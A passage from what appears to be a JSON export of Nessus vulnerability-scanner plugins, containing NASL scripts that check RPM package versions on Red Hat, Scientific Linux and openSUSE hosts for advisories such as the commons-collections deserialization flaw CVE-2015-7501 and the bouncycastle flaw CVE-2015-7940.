(rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.26-57.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-javadoc-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-lib-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-log4j-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat6-webapps-6.0.41-19_patch_04.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-javadoc-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-lib-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-log4j-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-webapps-7.0.54-28_patch_05.ep6.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-debuginfo-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-devel-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-manual-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"httpd22-tools-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-14.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_cluster-native-1.2.13-9.Final_redhat_2.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_cluster-native-debuginfo-1.2.13-9.Final_redhat_2.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ldap22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"mod_ssl22-2.2.26-58.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-admin-webapps-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-docs-webapp-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-el-2.1-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-javadoc-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-jsp-2.1-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-lib-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-log4j-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-maven-devel-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-servlet-2.5-api-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat6-webapps-6.0.41-19_patch_04.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-admin-webapps-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-docs-webapp-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-el-2.2-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-javadoc-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsp-2.2-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-lib-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-log4j-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-maven-devel-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-servlet-3.0-api-7.0.54-28_patch_05.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-webapps-7.0.54-28_patch_05.ep6.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T22:32:05", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4274 advisory.\n\n - apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-01-23T00:00:00", "type": "nessus", "title": "RHEL 7 : rh-maven35-apache-commons-collections4 (RHSA-2020:4274)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4", "p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4-javadoc"], "id": "REDHAT-RHSA-2020-4274.NASL", "href": "https://www.tenable.com/plugins/nessus/170296", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4274. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(170296);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2020:4274\");\n\n script_name(english:\"RHEL 7 : rh-maven35-apache-commons-collections4 (RHSA-2020:4274)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4274 advisory.\n\n - apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-7501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4274\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1279330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rh-maven35-apache-commons-collections4 and / or rh-maven35-apache-commons-collections4-javadoc\npackages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(284, 502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4-javadoc\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/os',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/os',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'rh-maven35-apache-commons-collections4-4.0-7.3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'rh-maven35-apache-commons-collections4-javadoc-4.0-7.3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'rh-maven35-apache-commons-collections4 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:44:57", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons- collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific deserialization vulnerability is to remove the vulnerable class files (InvokerTransformer, InstantiateFactory, and InstantiateTransformer) in all commons-collections jar files. Any manual changes should be tested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : jakarta-commons-collections on SL6.x (noarch) (20151130)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20151130_JAKARTA_COMMONS_COLLECTIONS_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/87121", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87121);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n\n script_name(english:\"Scientific Linux Security Update : jakarta-commons-collections on SL6.x (noarch) (20151130)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons- collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-\ncollections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nIn the interim, the quickest way to resolve this specific\ndeserialization vulnerability is to remove the vulnerable class files\n(InvokerTransformer, InstantiateFactory, and InstantiateTransformer)\nin all commons-collections jar files. Any manual changes should be\ntested to avoid unforseen complications.\n\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1511&L=scientific-linux-errata&F=&S=&P=17116\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1bc1816\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:05", "description": "bouncycastle was updated to version 1.53 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-7940: Invalid curve attack (bsc#951727).", "cvss3": {}, "published": "2015-11-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bouncycastle (openSUSE-2015-705)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bouncycastle", "p-cpe:/a:novell:opensuse:bouncycastle-javadoc", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2015-705.NASL", "href": "https://www.tenable.com/plugins/nessus/86740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-705.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86740);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"openSUSE Security Update : bouncycastle (openSUSE-2015-705)\");\n script_summary(english:\"Check for the openSUSE-2015-705 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bouncycastle was updated to version 1.53 to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-7940: Invalid curve attack (bsc#951727).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=951727\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bouncycastle packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bouncycastle-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2|SUSE42\\.1)$\") 